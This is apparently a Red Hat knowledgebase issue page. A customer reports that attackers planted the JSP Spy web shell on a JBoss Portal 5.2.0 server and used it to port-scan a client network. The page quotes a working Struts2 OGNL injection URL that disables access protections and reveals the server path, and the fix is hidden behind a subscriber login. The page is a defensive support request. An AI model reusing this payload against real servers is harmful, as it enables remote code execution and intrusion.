We got an attack from JSP Spy

Solution Verified - Updated -

Issue

Someone from internet can install "JSP Spy" in our EPP server and uses it to do port scanning in customer network. It harms the network firewall and customer let us to stop our service to find the way that hacker can install "JSP Spy" into EPP server.

It allow people to send java code via HTTP request and run it on server via struts framework , eg:

"https://myhost/myportlets/myaction/view/ajax.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43req\75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i95%29%28%28%27\43xman.getWriter%28%29.println%28\43req.getRealPath%28%22\u005c%22%29%29%27%29%28d%29%29&%28i99%29%28%28%27\43xman.getWriter%28%29.close%28%29%27%29%28d%29%29"

How can we prevent people from installing it?

Environment

Red Hat JBoss Portal (EPP) 5.2.0

Subscriber exclusive content

A Red Hat subscription provides unlimited access to our knowledgebase of over 48,000 articles and solutions.

Current Customers and Partners

Log in for full access

Log In
Close

Welcome! Check out the Getting Started with Red Hat page for quick tours and guides for common tasks.